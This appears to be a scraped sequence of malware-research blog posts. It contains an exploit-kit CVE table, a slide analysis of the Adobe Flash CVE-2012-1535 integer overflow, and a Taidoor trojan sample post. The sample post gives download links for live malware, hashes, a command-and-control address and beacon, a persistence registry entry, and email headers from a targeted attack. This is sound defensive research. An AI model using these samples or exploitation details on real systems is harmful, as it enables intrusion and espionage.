CVE-2012-4681

Sweet Orange 1.0

05-'12

CVE-2006-0003

CVE-2010-0188

CVE-2011-3544

Phoenix 3.1.15

05-'12

CVE-2010-0842

CVE: 2010-0248

CVE-2011-2110

CVE-2011-2140

CVE: 2011-2371

CVE-2011-3544

CVE-2011-3659

Firefox social

CVE: 2012-0500

CVE-2012-0507

CVE-2012-0779

NucSoft

2012

CVE-2010-0188

CVE-2012-0507

Sakura 1.1

08-'12

CVE-2006-0003

CVE-2010-0806

CVE-2010-0842

CVE-2011-3544

CVE-2012-4681

Version 16. April 2, 2012

Thanks to Kahu security
for Wild Wild West graphic

The full table in xls format - Version 16 can be downloaded from here.

ADDITIONS AND CHANGES:

1. Blackhole Exploit Kit 1.2.3

Added:

CVE-2011-0559 - Flash memory corruption via F-Secure
CVE-2012-0507 - Java Atomic via Krebs on Security
CVE-2011-3544 - Java Rhino via Krebs on Security

2. Eleonore Exploit Kit 1.8.91 and above- via Kahu Security

Added:

CVE-2012-0507 - Java Atomic- after1.8.91was released
CVE-2011-3544 - Java Rhino
CVE-2011-3521 - Java Upd.27 see Timo Hirvonen, Contagio, Kahu Security and Michael 'mihi' Schierl
CVE-2011-2462 - Adobe PDF U3D

Also includes
"Flash pack" (presumably the same as before)
"Quicktime" - CVE-2010-1818 ?

3. Incognito Exploit Packv.2 and above

there are rumors that Incognito development stopped after v.2 in 2011 and it is a different pack now. If you know, please send links or files.

Added after v.2 was released:

CVE-2012-0507 - Java Atomic

See V.2 analysisvia StopMalvertizing

4. Phoenix Exploit Kit v3.1 - via Malware Don't Need Coffee

Added:

CVE-2012-0507 - Java Atomic
CVE-2011-3544 - Java Rhino + Java TC (in one file)

5. Nuclear Pack v.2 - via TrustWave Spiderlabs

CVE-2011-3544 Oracle Java Rhino
CVE-2010-0840 JRE Trusted Method Chaining
CVE-2010-0188 Acrobat Reader – LibTIFF
CVE-2006-0003 MDAC

6. Sakura Exploit Pack > v.1 via DaMaGeLaB

----------------------------------------------------

Swiffy output

----------------------------------------------------
Sakura pack ad (image credit DaMaGeLaB and the owner)

Added:

CVE-2011-3544 - Java Rhino (It was in Exploitpack table v15, listing it to show all packs with this exploit)

7. Chinese Zhi Zhu Pack via Kahu Security and Francois Paget (McAfee)

CVE-2012-0003 - WMP MIDI
CVE-2011-1255 - IE Time Element Memory Corruption
CVE-2011-2140 - Flash 10.3.183.x
CVE-2011-2110 - Flash 10.3.181.x
CVE-2010-0806 - IEPeers

8. Gong Da Pack via Kahu Security

CVE-2011-2140 - Flash 10.3.183.x
CVE-2012-0003 - WMP MIDI
CVE-2011-3544 - Java Rhino

9. Dragon Pack - via DaMaGeLab December 2010 - it is old, listing for curiosity sake

CVE-2010-0886 - Java SMB
CVE-2010-0840 - JRE Trusted Method Chaining
CVE-2008-2463 - Snapshot
CVE-2010-0806 - IEPeers
CVE-2007-5659/2008-0655 - Collab.collectEmailInfo
CVE-2008-2992 - util.printf
CVE-2009-0927 - getIco
CVE-2009-4324 - newPlayer

Version 15. January 28, 2012

Additions - with many thanks to Kahu Security

Hierarchy Exploit Pack
=================
CVE-2006-0003
CVE-2009-0927
CVE-2010-0094
CVE-2010-0188
CVE-2010-0806
CVE-2010-0840
CVE-2010-1297
CVE-2010-1885
CVE-2011-0611
JavaSignedApplet

Siberia Private
==========
CVE-2005-0055
CVE-2006-0003
CVE-2007-5659
CVE-2008-2463
CVE-2008-2992
CVE-2009-0075
CVE-2009-0927
CVE-2009-3867
CVE-2009-4324
CVE-2010-0806

Techno XPack
===========
CVE-2008-2992
CVE-2010-0188
CVE-2010-0842
CVE-2010-1297
CVE-2010-2884
CVE-2010-3552
CVE-2010-3654
JavaSignedApplet

"Yang Pack"
=========
CVE-2010-0806
CVE-2011-2110
CVE-2011-2140
CVE-2011-354

Version 14. January 19, 2012

Version 14 Exploit Pack table additions:

Credits for the excellent Wild Wild West (October 2011 edition) go to kahusecurity.com

With many thanks to XyliBox (Xylitol - Steven), Malware Intelligence blog, and xakepy.cc for the information:

Blackhole 1.2.1 (Java Rhino added, weaker Java exploits removed)
Blackhole 1.2.1 (Java Skyline added)
Sakura Exploit Pack 1.0 (new kid on the block, private pack)
Phoenix 2.8. mini (condensed version of 2.7)
Fragus Black (weak Spanish twist on the original, black colored admin panel, a few old exploits added)

If you find any errors or CVE information for packs not featured , please send it to my email (in my profile above, thank you very much) .

The full table in xls format - Version 14 can be downloaded from here.

The exploit pack table in XLSX format
The exploit pack table in csv format

The references sheet in csv format

P.S. There are always corrections and additions thanks to your feedback after the document release, come back in a day or two to check in case v.15 is out.

Version 13. Aug 20, 2011

Kahusecurity issued an updated version of their Wild Wild West graphic that will help you learn Who is Who in the world of exploit packs. You can view the full version of their post in the link above.

Version 13 exploit pack table additions:

Bleeding Life 3.0
Merry Christmas Pack (many thanks to kahusecurity.com)+
Best Pack (many thanks to kahusecurity.com)
Sava Pack (many thanks to kahusecurity.com)
LinuQ
Eleonore 1.6.5
Zero Pack
Salo Pack (incomplete but it is also old)

List of packs in the table in alphabetical order

Best Pack
Blackhole Exploit 1.0
Blackhole Exploit 1.1
Bleeding Life 2.0
Bleeding Life 3.0
Bomba
CRIMEPACK 2.2.1
CRIMEPACK 2.2.8
CRIMEPACK 3.0
CRIMEPACK 3.1.3
Dloader
EL Fiiesta
Eleonore 1.3.2
Eleonore 1.4.1
Eleonore 1.4.4 Moded
Eleonore 1.6.3a
Eleonore 1.6.4
Eleonore 1.6.5
Fragus 1
Icepack
Impassioned Framework 1.0
Incognito
iPack
JustExploit
Katrin
Merry Christmas Pack
Liberty 1.0.7
Liberty 2.1.0*
LinuQ pack
Lupit
Mpack
Mushroom/unknown
Open Source Exploit (Metapack)
Papka
Phoenix 2.0
Phoenix 2.1
Phoenix 2.2
Phoenix 2.3
Phoenix 2.4
Phoenix 2.5
Phoenix 2.7
Robopak
Salo pack
Sava Pack
SEO Sploit pack
Siberia
T-Iframer
Unique Pack Sploit 2.1
Webattack
Yes Exploit 3.0RC
Zero Pack
Zombie Infection kit
Zopack

----------------------------------------------
Bleeding Life 3.0
New Version Ad is here

Merry Christmas Pack read analysis at kahusecurity.com	Best Pack read analysis at kahusecurity.com	Sava Pack read analysis at kahusecurity.com
Eleonore 1.6.5 [+] CVE-2011-0611 [+] CVE-2011-0559 [+] CVE-2010-4452 [-] CVE-2010-0886	Salo Pack Old (2009), added just for the collection	Zero Pack 62 exploits from various packs (mostly Open Source pack)
LinuQ pack Designed to compromise linux servers using vulnerable PHPMyAdmin. Comes with DDoS bot but any kind of code can be loaded for Linux botnet creation. LinuQ pack is PhpMyAdmin exploit pack with 4 PMA exploits based on a previous Russian version of the Romanian PMA scanner ZmEu. it is not considered to be original, unique, new, or anything special. All exploits are public and known well. It is designed to be installed on an IRC server (like UnrealIRCD). IP ranges already listed in bios.txt can be scanned, vulnerable IPs and specific PMA vulnerabilities will be listed in vuln.txt, then the corresponding exploits can be launched against the vulnerable server. It is more like a bot using PMA vulnerabilities than exploit pack. It is using CVE-2009-1148 (unconfirmed) CVE-2009-1149 (unconfirmed) CVE-2009-1150 (unconfirmed) CVE-2009-1151 (confirmed)

====================================================================

Version 12. May 26, 2011

additional changes (many thanks to kahusecurity.com)

Bomba

Papka

See the list of packs covered in the list below

The full table in xls format - Version 12 can be downloaded from here.

I want to thank everyone who sent packs and information :)

Version 11 May 26, 2011 Changes:

Phoenix2.7
"Dloader" (well, dloader is a loader but the pack is some unnamed pack http://damagelab.org/lofiversion/index.php?t=20852)
nuclear pack
Katrin
Robopak
Blackhole exploit kit 1.1.0
Mushroom/unknown
Open Source Exploit kit

====================================================================

10. May 8, 2011 Version 10 Exploit Pack Table_V10May11
First, I want to thank everyone who sent and posted comments for updates and corrections.

*** The Wild Wild West picture is from a great post about evolution of exploit packs by Kahu Security Wild Wild West Update

As usual, send your corrections and update lists.

Changes:

Eleonore 1.6.4
Eleonore 1.6.3a
Incognito
Blackhole

Go1Pack (not included) as reported as being a fake pack, here is a gui. Here is a threatpost article referencing it as it was used for an attack
Also, here is another article claiming it is not a fake http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx
Go1 Pack CVE are reportedly
CVE-2006-0003
CVE-2009-0927
CVE-2010-1423
CVE-2010-1885
Does anyone have this pack or see it offered for sale?

Exploit kits I am planning to analyze and add (and/or find CVE listing for) are:

Open Source Exploit Kit
SALO
K0de

Legend:

Black color entries by Francois Paget

Red color entries by Gunther

Blue color entries by Mila

Also, here is a great presentation by Ratsoul (Donato Ferrante) about Java Exploits (http://www.inreverse.net/?p=1687)

--------------------------------------------------------
9. April 5, 2011 Version 9 ExploitPackTable_V9Apr11

It actually needs another update but I am posting it now and will issue version 10 as soon as I can.

Changes:
Phoenix 2.5
IFramer
Tornado
Bleeding life

Many thanks to Gunther for his contributions.
If you wish to add some, please send your info together with the reference links. Also please feel free to send corrections if you notice any mistakes

8. Update 8 Oct 22, 2010 Version 8 ExploitPackTable_V8Oct22-10

Changes:

Eleonore 1.4.4 Moded added (thanks to malwareint.blogspot.com)
Correctionon CVE-2010-0746 in Phoenix 2.2 and 2.3. It is a mistake and the correct CVE is CVE-2010-0886 (thanks to
♫
etonshell for noticing)
SEO Sploit pack added (thanks to whsbehind.blogspot.com, evilcodecave.blogspot.com and blog.ahnlab.com)

7. Update 7 Oct 18, 2010 Version 7 ExploitPackTable_V7Oct18-10 released

thanks to SecNichewe have updates for Phoenix 2.4 :)

We also added shorthand/slang/abbreviated names for exploits for easy matching of exploits to CVE in the future. Please send us more information re packs, exploit names that can be added in the list. Thank you!

6. Update 6 Sept 27, 2010 Version 6 ExploitPackTable_V6Sept26-10 released

Thanks to Francois Paget (McAfee) we have updates for Phoenix 2.2 and Phoenix 2.3

5. Update 5. Sept 27, 2010 Version 5 ExploitPackTable_V5Sept26-10 released

Added updates for Phoenix 2.1 and Crimepack 3.1.3

4 Update 4 July 23, 2010 Version 4 ExploitPackTable_V4Ju23-10 released. Added a new Russian exploit kit called Zombie Infection Kit to the table. Read more at malwareview.com

Update 3 July 7, 2010. Please read more about this on the Brian Krebs' blogPirate Bay Hack Exposes User Booty

Update 2 June 27, 2010 Sorry but Impassioned Framework is back where it belongs - blue

Update 1 June 24, 2010Eleonore 1.4.1 columns was updated to include the correct list of the current exploits.

Francois Paget www.avertlabs.com kindly agreed to allow us to make additions to his Overview of Exploit Packs table published on Avertlabs (McAfee Blog)

Many thanks to Gunther from ARTeam for his help with the update. There are a few blanks and question marks, please do no hesitate to email me if you know the answer or if you see any errors.

Please click on the image below to expand it (it is a partial screenshot) Impassioned Framework is tentatively marked a different color because the author claims it is a security audit tool not exploit pack. However, there was no sufficient information provided yet to validate such claims. The pack is temporarily/tentatively marked a different color. We'll keep you posted.

↧

CVE-2012-1535 Adobe Flash Player Integer Overflow Vulnerability Analysis by Brian Mariani & Frédéric Bourla

October 14, 2012, 3:17 pm

≫ Next: CVE-2012-1535 Sep.9, 2012 "房號表.doc - Data for Reference.doc" and Taidoor trojan sample set for signature development

≪ Previous: An Overview of Exploit Packs (Update 17) October 12, 2012

Brian Mariani and Frédéric Bourla from High-Tech Bridge SA – www.htbridge.com sent their excellent deep analysis of CVE-2012-1535 vulnerability in Adobe Flash Player. The Word documents with Flash that exploited that vulnerability appeared in August but did not become as popular as RTF CVE-2012-0158, which remains to be the most widely used exploit for targeted email attachments.

The reason for it is that integer overflows are difficult to exploit in general and CVE-2012-1535 is less reliable than other exploits prevalent today. This does not mean it is not in use and I will post several recent samples with this exploit in the next article.
The full analysis is posted below, plus you can download it in PDF format.

Download the full paper (slides) in PDF format here
http://contagio.deependresearch.org/docs/CVE-2012-1535-Adobe-Flash-Player-Integer-Overflow-Vulnerability-Analysis.pdf

Download files for analysis:
http://contagiodump.blogspot.com/2012/08/cve-2012-1535-samples-and-info.html

---------------------------------------------------------------------------------------------------
Previous papers by the same authors

CVE #

CVE-2012-1535

ANALYSIS

Slide 02

A FEW WORDS ABOUT FLASH PLAYER

* Adobe Flash is a multimedia platform used to add animation, video, and interactivity to web pages.

* Flash manipulates vectors and graphics to provide animation of text, drawings

and images.

* It supports bidirectional streaming of audio and video.

* It can capture user inputs via mouse, keyboard, microphone and camera.

* Flash contains an object-oriented language called ActionScript.

* It supports automation via the JavaScript Flash language.

ADOBE FLASH PLAYER HISTORY

* Flash originated with the application SmartSketch, developed by Jonathan Gay.

* It was published by FutureWave Software, which was founded by Charlie

Jackson, Jonathan Gay and Michelle Welsh.

* As the Internet became more popular, FutureWave added cell animation editing to the vector drawing capabilities of SmartSketch and released FutureSplash Animator on multiple platforms.

* FutureWave approached Adobe Systems with an offer to sell them FutureSplash in 1995, but Adobe turned them down at that time.

* In 1996, FutureSplash was acquired by Macromedia and released as Flash, contracting "Future" and "Splash".

* Flash is currently developed and distributed by Adobe Systems, as the result of their purchase of Macromedia in 2005.

FLASH IS NOT AN EXCEPTION

* Just as other widespread software Adobe Flash Player has been heavily audited by cybercriminals the last years.

* Their main objective is to find high-risk security vulnerabilities which does almost not need user's interactivity in order to fully compromise a remote system.

* Since 2006 Adobe Flash security problems have raised considerably.

* Tens of vulnerabilities have been reported the last year.

* The following slides confirms this issue by giving an overview of Adobe Flash Player vulnerabilities reported between 2006 and 2011.

SOME STATISTICS

Reported vulnerabilities in Adobe Flash Player

SOME BAD NEWS ABOUT FLASH PLAYER

TIMELINE OF THE CVE 2012-1535

* In this document we will be focused in a pretty recent Adobe Flash Player

vulnerability tagged as CVE-2012-1535 by Mitre.

* Before the 14th August 2012 the flaw was seriously abused over Internet and mainly distributed through malicious Microsoft Word documents. [2] [4]

* On 14th August 2012 Adobe has finally released a patch. [2]

* On August 15th 2012 Alien Vault Labs [4] has published a brief analysis based on a malicious Microsoft Office Word documents with an embedded SWF file.

* The 17th August 2012 Mila Parkour from Contagiodump [3] has posted some of these samples.

* Finally, the 17th August 2012 Rapid7 has published a working exploit for IE 6/7 and 8 on Windows XP SP3 and finally updated the exploit for IE 9 on Windows 7 SP1.

SAMPLES FROM CONTAGIODUMP (1)

* Mila Parkour provided us with some of the aforementioned samples in order to dig about this vulnerability.

* These ones are Microsoft Word documents with an embedded SWF document.

* After a trivial analysis one can easily understand that these files contain suspicious data.

* There is enough doubtful information to realize that they were intended to launch a client side exploit in Adobe Flash Player.

* The following slides show some key information found in the sample “7E3770351AED43FD6C5CAB8E06DC0300-iPhone 5 Battery.doc.”

SAMPLES FROM CONTAGIODUMP (2)

* The Shockwave Flash object is easily identifiable.

SAMPLES FROM CONTAGIODUMP (3)

* The ActionScript heapspray code and the payload can definitely be recognized.

SAMPLES FROM CONTAGIODUMP (4)

* Eventually a strange font description named “Pspop” can be found embedded into the SWF document.

VULNERABILITY DETAILS

* The flaw relies on the ActiveX component of Adobe Flash Player before version 11.3.300.271.

* The code responsible for parsing the OTF file format (OpenType Format) triggers an exception when the file has a large nTables value contained in the kerning.

* After the code parses the OTF file, an integer overflow occurs and corrupts the memory.

* In this document we analyze the process which includes the ActionScript heap spray process finishing by triggering the vulnerability which permits code execution.

* Our lab environment is an English Windows XP SP3 operating system with Internet Explorer version 7 with Flash 11_3_300_268 installed.

INTEGER OVERFLOWS

* An integer overflow vulnerability differs a lot from other kinds of security issues such as buffer or heap overflows.

* One cannot hijack instantly the execution flow or directly write at arbitrary memory locations.

* Not all integer overflows are actually exploitable. Many can lead to a denial of service but not always to arbitrary code execution.

* What is true is that very often one could force a program to read or grab an erroneous value and this can contribute to create serious problems into the program’s logic.

* Owing to all these explanations, integer overflows vulnerabilities are relatively difficult to spot and to exploit.

HEAP SPRAYING WITH ACTIONSCRIPT

* ActionScript is a programming language used in Adobe Air and Flash.

* Heap spraying is an exploitation technique which consist in placing a specific sequence of bytes at a predictable memory location of the targeted process by allocating chunks of memory. It also provides a way to allocate chunks in the heap area.

* In the CVE-2009-1869 vulnerability a security researcher named Roee Hay used an ActionScript heap spraying in his exploit.

* The Actionscript code was originally published over Internet. [15]

* If you are willing to know more about heap spraying, please read this this document https://www.htbridge.com/publication/CVE-2012-1889.pdf

THE ACTIONSCRIPT HEAPSPRAY CODE

THE CODE DETAILS

* The most important lines are 3, 4 and from 17 up to 29.

* At line 3 the class array is used to create an object named Memory.

* At line 4 the size of the memory chunk is defined to 0x100000 bytes.

* At line 19, the function doSpray defines a variable named chunk of the

bytearray class.

* The while loop at line 21 will write the second argument using the ascii

character set in the memory chunk.

* Lastly at line 26 a for loop will fill up the memory object with the desired number

of chunks.

* The next slide show the results of this piece of code.

THE RESULTS OF HEAPSPRAYING

* Welcome to the 0x0c world!

* Let’s analyze the vulnerability now.

VULNERABILITY ANALYSIS (1)

* After triggering a working exploit, the call stack is as described in the image below:

VULNERABILITY ANALYSIS (2)

* One can observe that the return addresses start always from the 0x10000000 base memory address.

* This is clearly because we are dealing with a non-aslr (address space layout randomization) windows module.

VULNERABILITY ANALYSIS (3)

* At the line 00 it is possible to identify the 0x0c0c0c0b address which confirms that the flow of execution has been successfully hijacked.

VULNERABILITY ANALYSIS (4)

* Taking into consideration the last return address in the previous call stack minus ten bytes lets us discover the instruction who gains code execution.

* An EAX pointer seems to allow the attacker to redirect program flow control.

VULNERABILITY ANALYSIS (5)

* In order to trace the source of the problem we put a breakpoint at the entry point of the function containing the instruction responsible of triggering the exploit.

* After running the exploit again and breaking at the entry point, the last return address of the call stack tells us about the address 0x104354e4.

VULNERABILITY ANALYSIS (6)

* Just before the instruction at the address 0x104354e4 is a call which seems to jump to the function who gets the data from the malformed OTF file.

* We will call this function issue_func.

VULNERABILITY ANALYSIS (7)

* According to Rapid7 the code responsible for parsing the OTF file format triggers an exception when the file has a large nTables value contained in the kerning.

* If we refer to the malformed OTF file embedded into the SWF document the ntables value is set to 10000000.

VULNERABILITY ANALYSIS (8)

* After Adobe Flash loads the malicious SWF document in memory we can find the malformed OTF format and the crafted data some bytes farther in memory.

VULNERABILITY ANALYSIS (9)

* When Adobe Flash parses the OTF file the 10000000 value is passed during the execution of the issue_function.

* The instruction at the address 0x104418C0 reads the large ntable value 10000000.

VULNERABILITY ANALYSIS (10)

* Later the instruction SHL EAX, 4 at the address 0x104418c9 logically shifts the EAX register 4 bits to the left.

* This operation converts the EAX register value to ZERO, leading to an integer overflow. The erroneous value is then pushed into the stack at the instruction 0x104418cc.

* In the shifting instruction Adobe Flash does an operation over an invalid value and this is exactly what contributes to create serious problems into the program's logic but more importantly into the memory area.

* The integer overflow corrupts memory in such a way that it is possible to later gain code execution.

VULNERABILITY ANALYSIS (11)

* The code continues and reaches a call to a function which will parse the crafted data from the malformed OTF file.

* This function is resolved at the address 0x10442237.

VULNERABILITY ANALYSIS (12)

* In the heart of this function, the previously erroneous value pushed into the stack (00000000) will be taken at the instruction 0x10442261.

* When the code reaches this function for the third time the ECX register points to the beginning of the Kern Table.

* At this moment it starts to parse the data with the use of the EAX register as the offset reference.

VULNERABILITY ANALYSIS (13)

* At the fifth entry in the function the EAX register will be equal to 8.

* After adding the EAX and ECX registers, ECX will point to the crafted data which will later corrupt the memory.

VULNERABILITY ANALYSIS (14)

* At the end of the function EBX and EAX values will be equal to the 1e0cffe8 value.

* This value will be slightly modified and finally written into the memory pointed by the ESI register by four instructions located in the issue_func function.

VULNERABILITY ANALYSIS (15)

* Here’s the memory corruption after the code has processed the previously described instructions many times.

VULNERABILITY ANALYSIS (16)

* From the issue_func function, the code will push the ESI register and calls the function at the address 0x1044167b.

* This is the function which triggers the payload.

VULNERABILITY ANALYSIS (17)

* At this moment the ESI register points to the corrupted memory.

* The EAX register gets the value pointed by ESI at the address 0x10441687.

* Eventually after reaching the CALL instruction the arbitrary code execution is reached.

MITIGATE THE RISK

* Updating is the best choice for protecting yourself from this specific threat. [14]

* When this kind of threats is delivered through Microsoft Office documents some mitigations techniques are available, such as:

• Using EMET.

• Setting the protected view as the default mode.

• Enforcing ActiveX security settings.

REFERENCES

* [1] http://en.wikipedia.org/wiki/Adobe_Flash

* [2] http://www.adobe.com/support/security/bulletins/apsb12-18.html

* [3] http://contagiodump.blogspot.ch/2012/08/cve-2012-1535-samples-and-info.html

* [4] http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/

* [5] https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-

2012-1535-now-available-for-metasploit

* [6] http://downloads.securityfocus.com/vulnerabilities/exploits/55009.rb

* [7] http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/

* [8] http://livedocs.adobe.com/flash/9.0_fr/ActionScriptLangRefV3/Array.html

* [9] http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118676a5388-8000.html

* [10] https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

* [11] https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit

* [12] http://www.phrack.org/issues.html?issue=60&id=10

* [13] http://blogs.technet.com/b/mmpc/archive/2012/08/31/a-technical-analysis-on-cve-2012-1535-adobe- flash-player-vulnerability-part-2.aspx

* [14] http://get.adobe.com/flashplayer

* [15] http://code.google.com/p/roeehay/source/browse/trunk/Adobe_Flash_CVE-2009- 1869/src/HeapLib.as?r=2

THANK YOU FOR READING!

Your questions are always welcome! brian.mariani@htbridge.com frederic.bourla@htbridge.com

↧

CVE-2012-1535 Sep.9, 2012 "房號表.doc - Data for Reference.doc" and Taidoor trojan sample set for signature development

October 15, 2012, 10:33 pm

≫ Next: Group Photos.zip OSX/Revir | OSX/iMuler samples March 2012-November 2012

≪ Previous: CVE-2012-1535 Adobe Flash Player Integer Overflow Vulnerability Analysis by Brian Mariani & Frédéric Bourla

As promised, here is one sample of CVE-2012-1535 that you can use to follow the exploit analysis in the previous post CVE-2012-1535 Adobe Flash Player Integer Overflow Vulnerability Analysis by Brian Mariani & Frédéric Bourla. It is from September 9, 2012, I have one from October, which I will post shortly as well. If you are not interested in the exploit, you can use the Taidoor payload plus 18 other Taidoor binaries to develop your own signatures for this trojan or test your AV.

This message was sent to Taiwan government and is digitally signed with a valid signature. I am not sure if the signature is obtained for a fake account or the account is hijacked, this is why I am not posting the email address. If you work for TW government, you can ask for it. There was also a PDF attached with a personally identifiable information (full application) of an applicant for International Cooperation and Development Fund (Taiwan) - Women Development program. It is not included in this post. I assume it was stolen earlier as well.

CVE #

CVE-2012-1535

Download

Download (email me if you need the password)

http://contagio.deependresearch.org/files/CVE/CVE-2012-0158_Taidpoor_malware_2C199988A121B60818FA7D534E6C67B4.zip (with Taidoor 40d79d1120638688ac7d9497cc819462)
http://contagio.deependresearch.org/files/bin/Taidoor_tar.zip (tar archive contents with taidoor binary desktop.ini 6D6B797C99A11B066746948EB1EF4AA8 and shortcut to it)

Download 18 Taidoor binaries for signature development and research (email me if you need the password)

List of files

CVE-2012-1535 2C199988A121B60818FA7D534E6C67B4  房號表.doc

Taidoor binaries for research

0D0F38981E6CF09E82D6E55388A6F478

22E4F5AF13E6142E1623DFBFA05B5AD4

30768B6024557DDA108B648DC535A5EB

40D79D1120638688AC7D9497CC819462

6841A2C4EA247786241F5AB07050E3A4

7B806E6BFC75155EF8FC3DDC9D2B0113

83A0609EE10D87A66278CCCEBF8C6449

A47BDA32F159DEFC594D41526C65130A

A5E11557AF48B26279B430E1D1249A3B

AC3B1CABE39BCBD517B5E24A2320360F

C07F9E0C804D8972E5D8D3F000DF5CDE

C26178BF39160BF7B362A83D15F808E4

CC2C80F5472EC9A915452BB6F023063C

D5AB3E5DFC80FD03C789C5733B666B9C

E8CDFD82AA1F52F3CD2BBD845E17B354

F1A1C8900829185C5367C57A26453A13

F61056E724133467EDF61DECE1C9AEBF

F99554368B58D31F3AA389E81A98A95A

Payload information

40d79d1120638688ac7d9497cc819462 Taidoor WPFFontCache_v0400.exe ( in Word)

6d6b797c99a11b066746948eb1ef4aa8 Taidoor desktop.ini in the tar file (appears malformed)

The message sent to TW government

Digitally signed

房號表.doc

Data for reference

Table of the room number '

Receive please reply

lure 2C199988A121B60818FA7D534E6C67B4

Thank you

Tel :505-22771333

Fax :505-22674025

-----------------------------------------------------------

From: xxxxxxxx [mailto:xxxx@yahoo.com.tw]

Sent: Monday, September 10, 2012 10:46 PM

To: xxxxxxxx@mac.gov.tw

Subject: 資料供參考

收到煩請回覆

謝謝

Tel:505-22771333

Fax:505-22674025

#1 2C199988A121B60818FA7D534E6C67B4

Payload - Trojan Taidoor / Simbot embedded in the Word document and inside the tar archive (desktop.ini (Taidoor 9 / 43 Virustotal) file with a PDF (Virustotal ) and a shortcut file (C:\WINDOWS\system32\cmd.exe /c desktop.ini)

Virustotal for 5387ad3225657f8857ddeaf70346722b1ef232beff3d74a9bf8d31738fc9c59a

Created files locations

Local Settings\Temp\ÿÿÿÿÿÿ.doc <decoy

Local Settings\Messenger.exe < file name varies

Local Settings\NetDDEdsdm.exe

Local Settings\WPFFontCache_v0400.exe

Local Settings\Temp\~dfds3.reg

Artifacts locations

Doctor Watson files due to the initial crash

Local Settings\History\History.IE5\MSHist012012101420121015\index.dat

Local Settings\Temp\65824578.od

Local Settings\Temp\dw.log

Local Settings\Temp\Word8.0\ShockwaveFlashObjects.exd

Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol

\Temporary Internet Files\Content.MSO\26F7849B.wmf

Created files:

MD5:

Messenger.exe 40d79d1120638688ac7d9497cc819462 << file name varies!

NetDDEdsdm.exe 40d79d1120638688ac7d9497cc819462

WPFFontCache_v0400.exe 40d79d1120638688ac7d9497cc819462

~dfds3.reg eeda7daba8d3329e33a9d2b0e56f4f80

Sha256

5387ad3225657f8857ddeaf70346722b1ef232beff3d74a9bf8d31738fc9c59a WPFFontCache_v0400.exe

7cb6182a8972a6aae9511f9d23ef6414a30bfb24fa8f1926d3cd81072414f75d ~dfds3.reg

Artifacts

26F7849B.wmf

66121875.od

dw.log

index.dat

ShockwaveFlashObjects.exd

ssdeep:

384:yPNY1M5Zni1HHl2EqVZqbS0hVYk4h5t6Dla:kEq8l2nqbXYP60,"Messenger.exe"

Traffic

Process ID: 2744 (svchost.exe)

Process doesn't appear to be a service

PID Port Local IP State Remote IP:Port

2744TCP 1229 172.16.253.132 ESTABLISHED 211.234.117.141:443

211.234.117.141 <-> 172.16.253.132 1000 103328 862 51720 1862 155048

Active Connections

Proto Local Address Foreign Address State PID

TCP 172.16.253.132:1375 211.234.117.141:443 FIN_WAIT_2 2744

C:\WINDOWS\system32\WS2_32.dll

C:\WINDOWS\system32\WININET.dll

[svchost.exe]

WHOIS Source: APNIC

IP Address: 211.234.117.141

Country: Korea, Republic Of

Network Name: KIDC-KR

Owner Name: LG DACOM KIDC

From IP: 211.234.96.0

To IP: 211.234.127.255

Allocated: Yes

Contact Name: Host Master

Address: 11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,, Seoul, Korea, 137-857

Email: hostmaster@nic.or.kr

Phone: +82-2-2186-4500

Fax: +82-2-2186-4496

GET /apzsr.php?id=021793111D309GE67E HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: 211.234.117.141:443

Connection: Keep-Alive

Cache-Control: no-cache

strings_~dfds3.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"WPFFontCache_v0400"="C:\\Documents and Settings\\Laura\\Local Settings\\WPFFontCache_v0400.exe"

Email Headers

SAMPLE #1 2C199988A121B60818FA7D534E6C67B4

Microsoft Mail Internet Headers Version 2.0

Received: from mse99.trade.gov.tw ([172.16.2.4]) by mail93.trade.gov.tw over TLS secured channel with Microsoft SMTPSVC(6.0.3790.4675);

Tue, 11 Sep 2012 10:46:25 +0800

Received: from AntiSpam.trade.gov.tw (antispam.trade.gov.tw [172.17.1.4])

by mse99.trade.gov.tw with ESMTP id q8B2kJNZ080932

for <xxxxxxxxxx@trade.gov.tw>; Tue, 11 Sep 2012 10:46:19 +0800 (GMT-8)

(envelope-from xxxxxxx@yahoo.com.tw)

Received: from nm26-vm9.bullet.mail.sg3.yahoo.com (nm26-vm9.bullet.mail.sg3.yahoo.com [106.10.151.120])

by AntiSpam.trade.gov.tw with SMTP id q8B2kCCb051478

for <smh@trade.gov.tw>; Tue, 11 Sep 2012 10:46:12 +0800 (CST)

(envelope-from xxxxxxxxxxx@yahoo.com.tw)

Received: from [106.10.166.116] by nm26.bullet.mail.sg3.yahoo.com with NNFMP; 11 Sep 2012 02:46:12 -0000

Received: from [106.10.167.238] by tm5.bullet.mail.sg3.yahoo.com with NNFMP; 11 Sep 2012 02:46:10 -0000

Received: from [127.0.0.1] by smtp211.mail.sg3.yahoo.com with NNFMP; 11 Sep 2012 02:46:10 -0000

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com.tw; s=s1024; t=1347331570; bh=y/fTGjKrz3P9wnnVOmsuyivYegUymx1m+pNZIqSI8io=; h=X-Yahoo-Newman-Id:X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-SMTP:Received:Message-ID:From:To:Subject:Date:MIME-Version:Content-Type:X-Priority:X-MSMail-Priority:X-Mailer:X-MimeOLE; b=BUNM174C2z5YUcyGfAKTAir+opr4A/fP53RmctXSWVtyJjmanA9UACeePVMrBEal78LLYCM9Rsxwhilp1zL6WIllyIrpr0QkSCwH0cviuMoVeHcbOn+NYjedOkZW4gU2Cc7E0cUSoiCJcX+IB/S698snOtUrF1P7Myy0DbOpoC4=

X-Yahoo-Newman-Id: 538238.79310.bm@smtp211.mail.sg3.yahoo.com

